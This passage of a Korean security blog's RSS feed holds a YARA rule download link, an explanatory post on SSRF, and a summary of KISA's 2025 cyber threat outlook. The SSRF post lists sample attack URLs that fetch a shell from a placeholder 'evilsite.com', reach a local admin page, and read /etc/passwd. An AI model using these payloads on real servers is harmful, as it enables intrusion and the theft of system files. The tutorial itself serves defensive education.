&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;fileblock&quot; data-ke-align=&quot;alignCenter&quot;&gt;&lt;a href=&quot;https://blog.kakaocdn.net/dn/pHXnw/btsLCKSfGPX/HCKXkKgvGMAKDYNTUCKkS0/KrCERT%20Operation%20BookCode%20Yara%20Rule%20V2.yar?attach=1&amp;amp;knm=tfile.yar&quot; class=&quot;&quot;&gt;
    &lt;div class=&quot;image&quot;&gt;&lt;/div&gt;
    &lt;div class=&quot;desc&quot;&gt;&lt;div class=&quot;filename&quot;&gt;&lt;span class=&quot;name&quot;&gt;KrCERT Operation BookCode Yara Rule V2.yar&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;size&quot;&gt;0.01MB&lt;/div&gt;
&lt;/div&gt;
  &lt;/a&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>[IT 및 보안]  /[IT 및 보안] 보고서  </category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/653</guid>
      <comments>https://jennana.tistory.com/653#entry653comment</comments>
      <pubDate>Sat, 4 Jan 2025 02:22:08 +0900</pubDate>
    </item>
    <item>
      <title>[웹 보안] SSRF 취약점</title>
      <link>https://jennana.tistory.com/652</link>
      <description>&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot;&gt;&lt;h2 style=&quot;text-align: center;&quot; data-ke-size=&quot;size26&quot;&gt;&lt;b&gt;[웹&amp;nbsp;보안]&amp;nbsp;SSRF&amp;nbsp;취약점&lt;/b&gt;&lt;/h2&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: center;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #353638;&quot;&gt;Server-Side Request Forgery&lt;/span&gt;&lt;/b&gt;&amp;nbsp;&lt;/p&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;h3 data-ke-size=&quot;size23&quot;&gt;1. 개요&lt;/h3&gt;&lt;p data-ke-size=&quot;size16&quot;&gt;SSRF 공격은 2021년 OWASP TOP10에 새로 추가된 항목이다.&lt;/p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;895&quot; data-origin-height=&quot;265&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/9vpTl/btsLwqzEJ4i/pDBb62tmJJ3SWZguBRhWjk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/9vpTl/btsLwqzEJ4i/pDBb62tmJJ3SWZguBRhWjk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/9vpTl/btsLwqzEJ4i/pDBb62tmJJ3SWZguBRhWjk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F9vpTl%2FbtsLwqzEJ4i%2FpDBb62tmJJ3SWZguBRhWjk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;895&quot; height=&quot;265&quot; data-origin-width=&quot;895&quot; data-origin-height=&quot;265&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;br&gt;서버 측에서 위조된 HTTP요청을 발생시켜 직접적인 접근이 제한된 서버 내부 자원에 접근하여 외부로 데이터 유출 및 오동작을 유발하는 공격을 SSRF(Server-Side Request Forgery)라고 한다.&lt;br&gt;공격이 발현되는 시점이 CSRF는 클라이언트 측이고, SSRF는 서버 측인 것이 차이점이다.&lt;br&gt;CSRF는 웹 브라우저 하이재킹을하여 사용자로 하여금 악성 요청을 수행하도록 한다면, SSRF는 접근이 제한된 내부환경에 추가 공격이 가능하기 때문에 공격 영향도가 높다.&lt;/p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;890&quot; data-origin-height=&quot;586&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/U2EEO/btsLxjzH7lE/kWJ20jkCXxaCROv2CiX511/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/U2EEO/btsLxjzH7lE/kWJ20jkCXxaCROv2CiX511/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/U2EEO/btsLxjzH7lE/kWJ20jkCXxaCROv2CiX511/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FU2EEO%2FbtsLxjzH7lE%2FkWJ20jkCXxaCROv2CiX511%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;890&quot; height=&quot;586&quot; data-origin-width=&quot;890&quot; data-origin-height=&quot;586&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;h3 data-ke-size=&quot;size23&quot;&gt;2. SSRF 공격 예시&lt;/h3&gt;&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;br&gt;&lt;b&gt;정상 요청 :&lt;/b&gt;&lt;/p&gt;&lt;pre data-ke-type=&quot;codeblock&quot; class=&quot;bash&quot; data-ke-language=&quot;bash&quot;&gt;&lt;code&gt;GET https://test.com/id?content=dashboard.php&lt;/code&gt;&lt;/pre&gt;&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;br&gt;&lt;b&gt;악성 사이트 연결 (FILE Inclusion) :&lt;/b&gt;&lt;/p&gt;&lt;pre data-ke-type=&quot;codeblock&quot; class=&quot;bash&quot; data-ke-language=&quot;bash&quot;&gt;&lt;code&gt;GET https://test.com/id?content=https://evilsite.com/shell.php&lt;/code&gt;&lt;/pre&gt;&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;br&gt;&lt;b&gt;로컬에 존재하는 관리자 페이지 접근 :&lt;/b&gt;&lt;/p&gt;&lt;pre data-ke-type=&quot;codeblock&quot; class=&quot;bash&quot; data-ke-language=&quot;bash&quot;&gt;&lt;code&gt;GET https://test.com/id?content=http://localhost/administrator&lt;/code&gt;&lt;/pre&gt;&lt;p data-ke-size=&quot;size16&quot;&gt;호스트에서만 액세스할 수 있는 관리자 페이지에 액세스 하는 데 사용&lt;/p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;726&quot; data-origin-height=&quot;386&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/ceeLC7/btsLytBt1TD/lTVHZxc8UL9PdXRyznfBn1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/ceeLC7/btsLytBt1TD/lTVHZxc8UL9PdXRyznfBn1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/ceeLC7/btsLytBt1TD/lTVHZxc8UL9PdXRyznfBn1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FceeLC7%2FbtsLytBt1TD%2FlTVHZxc8UL9PdXRyznfBn1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;600&quot; height=&quot;319&quot; data-origin-width=&quot;726&quot; data-origin-height=&quot;386&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;로컬 파일 가져오기 :&lt;/b&gt;&lt;/p&gt;&lt;pre data-ke-type=&quot;codeblock&quot; class=&quot;bash&quot; data-ke-language=&quot;bash&quot;&gt;&lt;code&gt;GET https://test.com/id?content=file:///etc/passwd&lt;/code&gt;&lt;/pre&gt;&lt;p data-ke-size=&quot;size16&quot;&gt;file:///&amp;nbsp; 프로토컬 핸들러를 이용하여 로컬의 주요 파일을 가져오는 데 사용&lt;br&gt;&amp;nbsp;&lt;/p&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;p data-ke-size=&quot;size16&quot;&gt;출처 및 참고 :&amp;nbsp;&lt;br&gt;&lt;a href=&quot;https://www.igloo.co.kr/security-information/ssrf-%ec%b7%a8%ec%95%bd%ec%a0%90%ec%9d%84-%ec%9d%b4%ec%9a%a9%ed%95%9c-%ea%b3%b5%ea%b2%a9%ec%82%ac%eb%a1%80-%eb%b6%84%ec%84%9d-%eb%b0%8f-%eb%8c%80%ec%9d%91%eb%b0%a9%ec%95%88/&quot; target=&quot;_blank&quot;&gt;&lt;span&gt;https://www.igloo.co.kr/security-information/ssrf-%ec%b7%a8%ec%95%bd%ec%a0%90%ec%9d%84-%ec%9d%b4%ec%9a%a9%ed%95%9c-%ea%b3%b5%ea%b2%a9%ec%82%ac%eb%a1%80-%eb%b6%84%ec%84%9d-%eb%b0%8f-%eb%8c%80%ec%9d%91%eb%b0%a9%ec%95%88/&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;figure data-ke-type=&quot;opengraph&quot; data-og-title=&quot;SSRF 취약점을 이용한 공격사례 분석 및 대응방안&quot; data-ke-align=&quot;alignCenter&quot; data-og-description=&quot;01. SSRF 개요 서버 측에서 위조된 HTTP 요청을 발생시켜 직접적인 접근이 제한된 서버 내부 자원에 접근하여 외부로 데이터 유출 및 오동작을 유발하는 공격을 SSRF(Server Side Request Forgery)라고 한다. &quot; data-og-host=&quot;www.igloo.co.kr&quot; data-og-source-url=&quot;https://www.igloo.co.kr/security-information/ssrf-%ec%b7%a8%ec%95%bd%ec%a0%90%ec%9d%84-%ec%9d%b4%ec%9a%a9%ed%95%9c-%ea%b3%b5%ea%b2%a9%ec%82%ac%eb%a1%80-%eb%b6%84%ec%84%9d-%eb%b0%8f-%eb%8c%80%ec%9d%91%eb%b0%a9%ec%95%88/&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/btV4Uf/hyXOpIlN2s/Ey7Xy9jplLgBFS1K9bwgb0/img.jpg?width=920&amp;amp;height=624&amp;amp;face=0_0_920_624&quot; data-og-url=&quot;https://www.igloo.co.kr/security-information/ssrf-취약점을-이용한-공격사례-분석-및-대응방안/&quot;&gt;&lt;a href=&quot;https://www.igloo.co.kr/security-information/ssrf-취약점을-이용한-공격사례-분석-및-대응방안/&quot; target=&quot;_blank&quot; data-source-url=&quot;https://www.igloo.co.kr/security-information/ssrf-%ec%b7%a8%ec%95%bd%ec%a0%90%ec%9d%84-%ec%9d%b4%ec%9a%a9%ed%95%9c-%ea%b3%b5%ea%b2%a9%ec%82%ac%eb%a1%80-%eb%b6%84%ec%84%9d-%eb%b0%8f-%eb%8c%80%ec%9d%91%eb%b0%a9%ec%95%88/&quot;&gt;&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/btV4Uf/hyXOpIlN2s/Ey7Xy9jplLgBFS1K9bwgb0/img.jpg?width=920&amp;amp;height=624&amp;amp;face=0_0_920_624')&quot;&gt; &lt;/div&gt;&lt;div class=&quot;og-text&quot;&gt;&lt;p class=&quot;og-title&quot;&gt;SSRF 취약점을 이용한 공격사례 분석 및 대응방안&lt;/p&gt;&lt;p class=&quot;og-desc&quot;&gt;01. SSRF 개요 서버 측에서 위조된 HTTP 요청을 발생시켜 직접적인 접근이 제한된 서버 내부 자원에 접근하여 외부로 데이터 유출 및 오동작을 유발하는 공격을 SSRF(Server Side Request Forgery)라고 한다. &lt;/p&gt;&lt;p class=&quot;og-host&quot;&gt;www.igloo.co.kr&lt;/p&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;https://beaglesecurity.com/blog/article/server-side-request-forgery-attack.html&quot; target=&quot;_blank&quot;&gt;&lt;span&gt;https://beaglesecurity.com/blog/article/server-side-request-forgery-attack.html&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;figure data-ke-type=&quot;opengraph&quot; data-og-title=&quot;Server Side Request Forgery Attack&quot; data-ke-align=&quot;alignCenter&quot; data-og-description=&quot;A server-side request forgery attack lets an attacker send crafted requests from the back-end server of a vulnerable web application to target internal systems.&quot; data-og-host=&quot;beaglesecurity.com&quot; data-og-source-url=&quot;https://beaglesecurity.com/blog/article/server-side-request-forgery-attack.html&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/ddWczI/hyXSDEXC72/ySX8l8eOEYOGods1WUnWOK/img.png?width=840&amp;amp;height=428&amp;amp;face=0_0_840_428,https://scrap.kakaocdn.net/dn/ctpO4R/hyXOetjO81/F2im2MsPcj5el3vsabE6b1/img.png?width=840&amp;amp;height=428&amp;amp;face=0_0_840_428&quot; data-og-url=&quot;https://beaglesecurity.com/blog/article/server-side-request-forgery-attack.html&quot;&gt;&lt;a href=&quot;https://beaglesecurity.com/blog/article/server-side-request-forgery-attack.html&quot; target=&quot;_blank&quot; data-source-url=&quot;https://beaglesecurity.com/blog/article/server-side-request-forgery-attack.html&quot;&gt;&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/ddWczI/hyXSDEXC72/ySX8l8eOEYOGods1WUnWOK/img.png?width=840&amp;amp;height=428&amp;amp;face=0_0_840_428,https://scrap.kakaocdn.net/dn/ctpO4R/hyXOetjO81/F2im2MsPcj5el3vsabE6b1/img.png?width=840&amp;amp;height=428&amp;amp;face=0_0_840_428')&quot;&gt; &lt;/div&gt;&lt;div class=&quot;og-text&quot;&gt;&lt;p class=&quot;og-title&quot;&gt;Server Side Request Forgery Attack&lt;/p&gt;&lt;p class=&quot;og-desc&quot;&gt;A server-side request forgery attack lets an attacker send crafted requests from the back-end server of a vulnerable web application to target internal systems.&lt;/p&gt;&lt;p class=&quot;og-host&quot;&gt;beaglesecurity.com&lt;/p&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>웹 보안</category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/652</guid>
      <comments>https://jennana.tistory.com/652#entry652comment</comments>
      <pubDate>Fri, 27 Dec 2024 08:32:11 +0900</pubDate>
    </item>
    <item>
      <title>[KISA] 2025년 사이버 위협 전망</title>
      <link>https://jennana.tistory.com/651</link>
      <description>&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot;&gt;&lt;h2 style=&quot;text-align: center;&quot; data-ke-size=&quot;size26&quot;&gt;&lt;b&gt;[KISA]&amp;nbsp;2025년&amp;nbsp;사이버&amp;nbsp;위협&amp;nbsp;전망&lt;/b&gt;&lt;/h2&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;595&quot; data-origin-height=&quot;840&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/c8W2cs/btsLwKdy2Dv/skotH4D0gYA50sXqsLyZj0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/c8W2cs/btsLwKdy2Dv/skotH4D0gYA50sXqsLyZj0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/c8W2cs/btsLwKdy2Dv/skotH4D0gYA50sXqsLyZj0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fc8W2cs%2FbtsLwKdy2Dv%2FskotH4D0gYA50sXqsLyZj0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;595&quot; height=&quot;840&quot; data-origin-width=&quot;595&quot; data-origin-height=&quot;840&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot;&gt;&lt;h3 style=&quot;text-align: center;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;1. 2024년 사이버 위협 사례 분석&lt;/b&gt;&lt;/h3&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;h4 data-ke-size=&quot;size20&quot;&gt;1. 사이버 사기로 인한 국민 불편 및 금융피해 지속&lt;/h4&gt;&lt;blockquote data-ke-style=&quot;style3&quot;&gt;&lt;b&gt; [주요 사고 사례 및 동향]&lt;/b&gt;&lt;br&gt;• 기업 문자발송 시스템 및 계정 해킹을 통한 스팸문자 발송 주의(5월) &lt;br&gt;• ‘티몬·위메프’ 환불 미끼, 스미싱 주의··· 금융·개인정보 털린다(8월) &lt;br&gt;• 과태료 내려고 QR코드 열었더니... ‘큐싱’ 피해 당부 주의보(10월) &lt;br&gt;• 정부, 불법 쓰레기 편지(스팸) 방지 종합대책 발표(11월)&lt;/blockquote&gt;&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;&lt;h4 data-ke-size=&quot;size20&quot;&gt;2. SW 공급망 공격은 기본, 복합적인 공격 전술 사용&lt;/h4&gt;&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #009A87;&quot;&gt;&amp;nbsp; * SW 공급망 공격은 신뢰받는 소프트웨어와 업데이트 체계를 악용해 SW 개발-유통-이용 등 SW 공급망 전단계에서 광범위하게 악성코드를 유포하고 보안 프로그램의 탐지를 회피할 수 있어, 사이버 공격자들이 선호하는 방식 중 하나다. &lt;/span&gt;&lt;/p&gt;&lt;blockquote data-ke-style=&quot;style3&quot;&gt;&lt;b&gt;[주요 사고 사례 및 동향]&lt;/b&gt;&lt;br&gt;• 건설 관련 홈페이지의 보안 프로그램 설치 파일 변조(1월)&lt;br&gt;• 리눅스 오픈소스 압축 프로그램(XZ Utils) 최신버전에서 악성코드 발견(3월) &lt;br&gt;• 국내 무료 SW의 특정 토스트 팝업 광고 프로그램 악용(5월)&lt;/blockquote&gt;&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;br&gt;&lt;b&gt;- 건설기술 부야 홈페이지 보안 프로그램 설치 파일 변조 :&lt;/b&gt; 홈페이지 로그인을위해서 필요한 보안 프로그램 설치 파일이 변조되어 악성코드가 유포된 사건/ 공격자는 공격 대상이 자주 방문하는 홈페이지에 잠복하여 악성코드를 퍼뜨리는 워터링홀 공격 기법 + 악성코드를 이용하여 국내 소프트웨어 개발사의 유표한 디지털 인증서를 탈취하여 믿을 수 있는 서비스로 위창하는 방법으로 백신을 회피하여 보안 프로글매 설치 파일을 변조하는 방식을 결합&lt;br&gt;&amp;nbsp;&lt;br&gt;&lt;b&gt;- 리눅스 오픈소스 압축 프로그램(XZ Utils) 최신버전에서 악성코드 발견 :&lt;/b&gt; 리눅스 및 GNU 그룹에서 기본적으로 제공하는 데이터 압축 유틸리티(XZ Utils)의 최신버전(5.60, 5.61)에서 백도어가 발견. 공격자가 2021년부터 오픈소스 프로젝트에 참가하여 운영자와 신뢰를 쌓아서 의도적으로 악성코드를 삽입하여 배포&lt;br&gt;&amp;nbsp;&lt;br&gt;&lt;b&gt;- 국내 무료 SW의 특정 토스트 팝업 광고 프로그램 악용 :&lt;/b&gt; 특정 토스트 광고 프로그램이 광고 콘텐츠를 내려받을 때 지원이 종료된 취약한 인터넷 익스플로러 모듈을 사용한다는 점을 노려 국내 특정 기업의 토스트 팝업 광고 프로그램을 악용한 대규모 사이버 공격. 온라인 광고를 통해 악성코드를 유포하는 멀버타이징(Malvertising) 공격 기법과 지원이 종료된 마이크로소프트의 윈도우 익스플로러 브라우저의 제로데이 취약점을 결합하여 사이버 공격에 악용&lt;br&gt;&lt;span style=&quot;color: #009A87;&quot;&gt;&amp;nbsp; * 토스트 : 사용자의 화면에 일시적으로 표시되고 작고 간단한 메시지 형태의 팝업 광고&lt;/span&gt;&lt;br&gt;&amp;nbsp;&lt;/p&gt;&lt;h4 data-ke-size=&quot;size20&quot;&gt;3. 랜섬 공격기법 고도화, 고객 정보 빌미로 삼중 갈취 공격 지속&lt;/h4&gt;&lt;blockquote data-ke-style=&quot;style3&quot;&gt;&lt;b&gt;[주요 사고 사례 및 동향]&lt;/b&gt;&lt;br&gt;• 1분기 랜섬웨어 공격 23% 증가... 보안 시스템 우회·합법적 도구 악용 증가(5월)&amp;nbsp;&lt;br&gt;• 해커 “법무법인 해킹 후, 탈취한 고객정보 공개 협박” 비트코인 요구(9월)&amp;nbsp; &lt;br&gt;• 상반기 랜섬웨어 피해 비용 평균 20억···진입장벽 낮아지고 방식 고도화(11월)&lt;/blockquote&gt;&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;br&gt;보안 장비 탐지 우회와&lt;br&gt;① 데이터 암호화에 그치지 않고,&lt;br&gt;② 기업의 기밀 자료를 유출하고 공개를 협박하며,&lt;br&gt;③ 피해 기업에 대해 디도스(DDoS) 공격 등 3중 갈취 전술을 사용하는 고도화된 공격 기법 이용&lt;/p&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;h3 style=&quot;text-align: center;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;2. 2025년 사이버 위협 전망&lt;/b&gt;&lt;/h3&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;p data-ke-size=&quot;size16&quot;&gt;1. 공격자의 생성형 AI 활용 본격화&lt;/p&gt;&lt;blockquote data-ke-style=&quot;style2&quot;&gt;• 생성형 AI의 악용이 본격화되며 사이버 범죄 도구로 활용될 가능성 증가 &lt;br&gt;• 기업의 안전한 생성형 AI 사용을 위해 보안 내재화, 보안 모니터링 체계 필요&lt;br&gt;• 사회적 갈등과 혼란을 부추기는 가짜뉴스 및 게시글을 통한 여론조작 우려&lt;/blockquote&gt;&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;br&gt;2. 디지털 융복합 시스템에 대한 사이버 위협 증가 예상&lt;/p&gt;&lt;blockquote data-ke-style=&quot;style2&quot;&gt;• 스마트팜, 스마트축산 등 디지털 융복합 시스템을 겨냥한 사이버 공격 확대 &lt;br&gt;• 5G 특화망(이음5G) 활용 확대에 따른 스마트시티 등 사이버 위협 우려 &lt;br&gt;• 주기적인 공격 표면 관리(ASM)로 위험 요소 제거 및 IoT 기기의 보안 강화 필요&lt;/blockquote&gt;&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;br&gt;3. 글로벌 환경 변화에 따른 사이버 위협 증가 가능성&lt;/p&gt;&lt;blockquote data-ke-style=&quot;style2&quot;&gt;• 트럼프 2기 행정부의 자국 우선주의, 가상자산 등 정책 변화에 따른 혼란 예상&lt;br&gt;• 국가배후 공격그룹과 핵티비스트 그룹의 공격 확대 우려 &lt;br&gt;• 국가 안보실을 중심으로 민·관·군의 사이버 위협 대응 및 협력체계 강화 필요&lt;/blockquote&gt;&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;br&gt;4. 무차별 디도스 공격 증가 예상&lt;/p&gt;&lt;blockquote data-ke-style=&quot;style2&quot;&gt;• 핵티비스트 등 다양한 목적의 무차별 디도스 공격 시도 증가 예상 &lt;br&gt;• 보안에 취약한 라우터 장비 대상 디도스 봇넷 구축 우려 &lt;br&gt;• KISA “디도스 사이버대피소”를 활용한 중소기업의 대응체계 강화 필요&lt;/blockquote&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;figure class=&quot;fileblock&quot; data-ke-align=&quot;alignCenter&quot;&gt;&lt;a href=&quot;https://blog.kakaocdn.net/dn/b5uewC/btsLwo2MTT7/XqE4bYZpryKk45OUcWYy2K/2025%EB%85%84%20%EC%82%AC%EC%9D%B4%EB%B2%84%20%EC%9C%84%ED%98%91%20%EC%A0%84%EB%A7%9D.pdf?attach=1&amp;amp;knm=tfile.pdf&quot; class=&quot;&quot;&gt;
    &lt;div class=&quot;image&quot;&gt;&lt;/div&gt;
    &lt;div class=&quot;desc&quot;&gt;&lt;div class=&quot;filename&quot;&gt;&lt;span class=&quot;name&quot;&gt;2025년 사이버 위협 전망.pdf&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;size&quot;&gt;4.71MB&lt;/div&gt;
&lt;/div&gt;
  &lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;br&gt;&amp;nbsp;&lt;br&gt;&amp;nbsp;&lt;br&gt;출처 : &lt;a href=&quot;https://boho.or.kr/kr/bbs/view.do?bbsId=B0000127&amp;amp;pageIndex=1&amp;amp;nttId=71610&amp;amp;menuNo=205021&quot; target=&quot;_blank&quot;&gt;&lt;span&gt;https://boho.or.kr/kr/bbs/view.do?bbsId=B0000127&amp;amp;pageIndex=1&amp;amp;nttId=71610&amp;amp;menuNo=205021&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;figure data-ke-type=&quot;opengraph&quot; data-og-title=&quot;KISA 보호나라&amp;amp;KrCERT/CC&quot; data-ke-align=&quot;alignCenter&quot; data-og-description=&quot;KISA 보호나라&amp;amp;KrCERT/CC&quot; data-og-host=&quot;www.boho.or.kr&quot; data-og-source-url=&quot;https://boho.or.kr/kr/bbs/view.do?bbsId=B0000127&amp;amp;pageIndex=1&amp;amp;nttId=71610&amp;amp;menuNo=205021&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/bar3xt/hyXSxdG78K/SfK0zECyKNPCWC0FvVRuJK/img.png?width=270&amp;amp;height=270&amp;amp;face=0_0_270_270,https://scrap.kakaocdn.net/dn/n0JuU/hyXOqN5t8L/mHplytQxMGeEsIMXrNlcBk/img.png?width=270&amp;amp;height=270&amp;amp;face=0_0_270_270,https://scrap.kakaocdn.net/dn/dL9pAW/hyXOpVVAbe/UCkEBrfucwxkGkc0mmkK7k/img.jpg?width=1098&amp;amp;height=328&amp;amp;face=0_0_1098_328&quot; data-og-url=&quot;http://boho.or.kr:80&quot;&gt;&lt;a href=&quot;http://boho.or.kr:80&quot; target=&quot;_blank&quot; data-source-url=&quot;https://boho.or.kr/kr/bbs/view.do?bbsId=B0000127&amp;amp;pageIndex=1&amp;amp;nttId=71610&amp;amp;menuNo=205021&quot;&gt;&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/bar3xt/hyXSxdG78K/SfK0zECyKNPCWC0FvVRuJK/img.png?width=270&amp;amp;height=270&amp;amp;face=0_0_270_270,https://scrap.kakaocdn.net/dn/n0JuU/hyXOqN5t8L/mHplytQxMGeEsIMXrNlcBk/img.png?width=270&amp;amp;height=270&amp;amp;face=0_0_270_270,https://scrap.kakaocdn.net/dn/dL9pAW/hyXOpVVAbe/UCkEBrfucwxkGkc0mmkK7k/img.jpg?width=1098&amp;amp;height=328&amp;amp;face=0_0_1098_328')&quot;&gt; &lt;/div&gt;&lt;div class=&quot;og-text&quot;&gt;&lt;p class=&quot;og-title&quot;&gt;KISA 보호나라&amp;amp;KrCERT/CC&lt;/p&gt;&lt;p class=&quot;og-desc&quot;&gt;KISA 보호나라&amp;amp;KrCERT/CC&lt;/p&gt;&lt;p class=&quot;og-host&quot;&gt;www.boho.or.kr&lt;/p&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>[IT 및 보안]  /[IT 및 보안] 보고서  </category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/651</guid>
      <comments>https://jennana.tistory.com/651#entry651comment</comments>
      <pubDate>Wed, 25 Dec 2024 07:40:06 +0900</pubDate>
    </item>
    <item>
      <title>[KISA] 사이버 위협 동향 보고서(2024년 상반기)</title>
      <link>https://jennana.tistory.com/650</link>
      <description>&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot; /&gt;
&lt;h1 style=&quot;text-align: center;&quot;&gt;&lt;b&gt;[KISA] 사이버 위협 동향 보고서(2023년 하반기)&lt;/b&gt;&lt;/h1&gt;
